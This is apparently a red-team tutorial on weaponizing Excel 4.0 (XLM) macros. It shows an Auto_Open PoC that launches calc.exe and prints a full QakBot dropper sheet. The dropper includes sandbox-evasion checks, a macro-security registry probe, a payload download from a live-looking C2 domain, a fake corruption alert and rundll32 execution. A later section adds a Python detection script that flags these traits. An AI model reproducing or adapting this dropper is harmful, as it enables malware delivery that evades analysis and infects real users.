# Weaponizing XLM 4.0 macros

XLM macros (Excel 4.0 macros) are part of the Microsoft Office suite and are a great resource for building an initial-foothold scenario that executes a payload during a red teaming exercise. This scenario is inspired by the following malware families, which abuse XLM macros to load their first stage into memory.

{% embed url="<https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot/#.YJQ_ibVKhPY>" %}

{% embed url="<https://seguranca-informatica.pt/flawedammyy-leveraging-undetected-xlm-macros-as-an-infection-vehicle/#.YJQ_wLVKhPb>" %}

## Playing with XLM macros

To start this lab, the first step is to create an XLM macro sheet inside an Excel document.

**Right-click the sheet tab** / **Insert...** / **"MS Excel 4.0 Macro"** / **OK**

After that, a new sheet will be created as presented below.

![](/files/-M_27lfnWJ_FqASjJnjJ)

As a first test, we can launch the `calc.exe` process when the document is opened.

```
=EXEC("calc.exe")
=HALT()
```

Note that we need to give cell `A1` the defined name `Auto_Open` (type it into the Name Box) if we want the macro to fire as soon as the document is opened:

![](/files/-M_29ceZ2IStcGvrcfVE)

After that, we can save our first PoC. Remember to save the workbook in a macro-enabled format (the Excel Macro-Enabled Workbook option near the top of the file-type list); otherwise Excel strips the macro sheet.

![](/files/-M_2AAT9D6_a2fgu1vwm)

As expected, calc.exe is launched when the Excel file is opened. :sunglasses:

![](/files/-M_2BM8jLxtXgveeRKO-)

## **Weaponizing XLM macros**

For a more complex scenario, we can simply adopt the approach used by the QakBot banking trojan, whose XLM dropper sheet looks like this:

```
=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5)
=WAIT(NOW()+"00:00:03")
=FOPEN("c:\users\public\1.reg")
=FPOS(R[-1]C, 215)
=FREAD(R[-2]C, 255)
=FCLOSE(R[-3]C)
=FILE.DELETE("c:\users\public\1.reg")
=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\csg75ef.html",0,0)
=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\csg75ef.html,DllRegisterServer",0,5)
=CLOSE(FALSE)
```

The first two lines deserve particular attention. They are an anti-analysis (sandbox-evasion) check used to decide whether the file is being opened by a human or by a machine (a sandbox). The GET.WORKSPACE() function returns properties of the environment; each property is referenced by a number.

The documentation for the two investigated properties is as follows:

* **19:** If a mouse is present, returns TRUE; otherwise, returns FALSE.
* **42:** If your computer is capable of playing sounds, returns TRUE; otherwise, returns FALSE.

When either property returns FALSE, it is a fairly good indication that the macro is running inside a sandbox rather than on a user's desktop. Hence `=IF(GET.WORKSPACE(19),,CLOSE(TRUE))` means: if there is no mouse, close the workbook and never reach the malicious part of the macro. This lets the sample evade dynamic-analysis products that do not emulate these characteristics properly.

The rest of the sheet follows the same pattern of checking before doing anything noisy. The third line closes the workbook unless `GET.WORKSPACE(1)` reports a Windows environment. Lines 4 to 11 use `reg.exe` to export the `HKCU\Software\Microsoft\Office\<version>\Excel\Security` key, read part of the export with `FOPEN`/`FPOS`/`FREAD`, delete it, and close the workbook if the data contains `0001`, i.e. if macro security has already been set to "enable all macros", a setting analysis sandboxes typically apply and real users rarely do. Only then does the macro download the payload with `URLDownloadToFileA` into `C:\Users\Public` (retrying once on failure), show the user a fake "corrupt workbook" alert, and run the dropped file through `rundll32.exe` via its `DllRegisterServer` export. Note the relative `R[-1]C`, `R[-2]C` references: each step consumes the value returned by a cell above it, which is how XLM chains results without variables.
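Because the whole dropper is plain formula text, a detection engineer can triage it statically without opening Excel. The following script is an added example (it is not code from the original post nor from QakBot): given the formulas of one macro-sheet column, row 1 first, plus the workbook's defined names, it straightens the smart quotes that copy/paste introduces, flags the `GET.WORKSPACE` sandbox probes, the `reg.exe` macro-security check, the `urlmon`/`Shell32` download and execution primitives, resolves the `R[-n]C` references so the `FOPEN`/`FREAD` chain is reported as one unit, and collapses everything into a verdict. The sample rows are a constructed copy of the sheet above with the live C2 domain replaced by the placeholder `c2.example`; the tag names and the `triage`/`verdict` helpers are my own, not from any tool.

```python
"""Static triage of Excel 4.0 (XLM) macro formulas."""
import re
from dataclasses import dataclass, field

WORKSPACE_PROBES = {19: "mouse present", 42: "can play sounds"}   # sandbox tells
QUOTE_MAP = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2033": '"',
                           "\u2018": "'", "\u2019": "'"})        # smart quotes
REL_REF = re.compile(r"R\[(-?\d+)\]C")             # R1C1 relative row reference
URL_RE = re.compile(r'"(https?://[^"]+)"')
EXE_RE = re.compile(r'"([A-Za-z]:\\[^"]+\.exe)"')

# Constructed sample: the QakBot-style sheet from the page, row 1 first, with the
# live C2 domain replaced by the placeholder c2.example and smart quotes kept.
SAMPLE = [
    r'=IF(GET.WORKSPACE(19),,CLOSE(TRUE))',
    r'=IF(GET.WORKSPACE(42),,CLOSE(TRUE))',
    r'=IF(ISNUMBER(SEARCH(“Windows”,GET.WORKSPACE(1))), ,CLOSE(TRUE))',
    r'=CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\reg.exe”,”EXPORT HKCU\Software\Microsoft\Office\”&GET.WORKSPACE(2)&”\Excel\Security c:\users\public\1.reg /y”,0,5)',
    r'=WAIT(NOW()+”00:00:03″)',
    r'=FOPEN(“c:\users\public\1.reg”)',
    r'=FPOS(R[-1]C, 215)',
    r'=FREAD(R[-2]C, 255)',
    r'=FCLOSE(R[-3]C)',
    r'=FILE.DELETE(“c:\users\public\1.reg”)',
    r'=IF(ISNUMBER(SEARCH(“0001”,R[-3]C)),CLOSE(FALSE),)',
    r'=CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://c2.example/stage1”,”c:\Users\Public\csg75ef.html”,0,0)',
    r'=IF(R[-1]C<0,CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://c2.example/stage1”,”c:\Users\Public\bwep5ef.html”,0,0),)',
    r'=ALERT(“The workbook cannot be opened or repaired by Microsoft Excel because it’s corrupt.”,2)',
    r'=CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\rundll32.exe”,”c:\Users\Public\csg75ef.html,DllRegisterServer”,0,5)',
    r'=CLOSE(FALSE)',
]

@dataclass
class Finding:
    row: int       # 1-based macro-sheet row; 0 means a workbook-level finding
    tag: str
    detail: str

@dataclass
class Report:
    findings: list = field(default_factory=list)

    def tags(self):
        return sorted({f.tag for f in self.findings})

    def rows_with(self, tag):
        return [f.row for f in self.findings if f.tag == tag]

def normalize(formula):
    """Straighten smart quotes so string literals match reliably."""
    return formula.translate(QUOTE_MAP).strip()

def triage(formulas, defined_names=()):
    """Walk one column of a macro sheet (row 1 first) and collect findings."""
    rep = Report()

    def add(row, tag, detail):
        rep.findings.append(Finding(row, tag, detail))

    for name in defined_names:            # Auto_Open/Auto_Close run on open/close
        if name.lower().startswith(("auto_open", "auto_close")):
            add(0, "auto_exec", f"defined name {name}")
    norm = [normalize(f) for f in formulas]
    for row, f in enumerate(norm, start=1):
        up = f.upper()
        for n in map(int, re.findall(r"GET\.WORKSPACE\((\d+)\)", up)):
            if n in WORKSPACE_PROBES and "CLOSE(" in up:      # bail out in a sandbox
                add(row, "sandbox_evasion", f"GET.WORKSPACE({n}): {WORKSPACE_PROBES[n]}")
            elif n == 1 and "SEARCH(" in up:                  # OS string check
                add(row, "os_check", "GET.WORKSPACE(1)")
        if "REG.EXE" in up and "\\EXCEL\\SECURITY" in up:     # macro-setting probe
            add(row, "macro_security_probe", "exports HKCU Excel\\Security")
        if "FREAD(" in up:                 # handle comes from an earlier FOPEN row
            for ref in (row + int(d) for d in REL_REF.findall(f)):
                if 1 <= ref <= len(norm) and norm[ref - 1].upper().startswith("=FOPEN("):
                    add(row, "file_read_chain", f"reads file opened on row {ref}")
        if "CALL(" in up and "URLMON" in up and "URLDOWNLOADTOFILE" in up:
            m = URL_RE.search(f)
            add(row, "download", m.group(1) if m else "non-literal URL")
        if "CALL(" in up and "SHELL32" in up and "SHELLEXECUTE" in up:
            m = EXE_RE.search(f)
            add(row, "execute", m.group(1) if m else "ShellExecuteA")
        if re.search(r"\bEXEC\(", up):
            add(row, "execute", "EXEC()")
        if up.startswith("=WAIT("):
            add(row, "delay", "WAIT()")
        if "ALERT(" in up and "CORRUPT" in up:
            add(row, "decoy_error", "fake corruption dialog")
    return rep

def verdict(rep):
    """Collapse findings into a triage label."""
    t = set(rep.tags())
    if "download" in t and "execute" in t:
        return "weaponized"
    if t & {"sandbox_evasion", "macro_security_probe", "execute", "auto_exec"}:
        return "suspicious"
    return "no indicators"

if __name__ == "__main__":
    report = triage(SAMPLE, defined_names=["Auto_Open"])
    for fnd in report.findings:
        print(f"row {fnd.row:>2}  {fnd.tag:<22} {fnd.detail}")
    print("verdict:", verdict(report))
```

Run it against the sample and the first `calc.exe` PoC: the QakBot-style sheet is tagged `weaponized` (download plus execution, with both URLs and both launched binaries extracted), while the two-line PoC only yields `auto_exec` and `execute` and is labelled `suspicious`. The `R[-n]C` resolution matters because a rule that only looks for `FOPEN` misses the point: the evasion lives in the chain, not in any single cell.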

{% embed url="<https://github.com/FortyNorthSecurity/EXCELntDonut>" %}
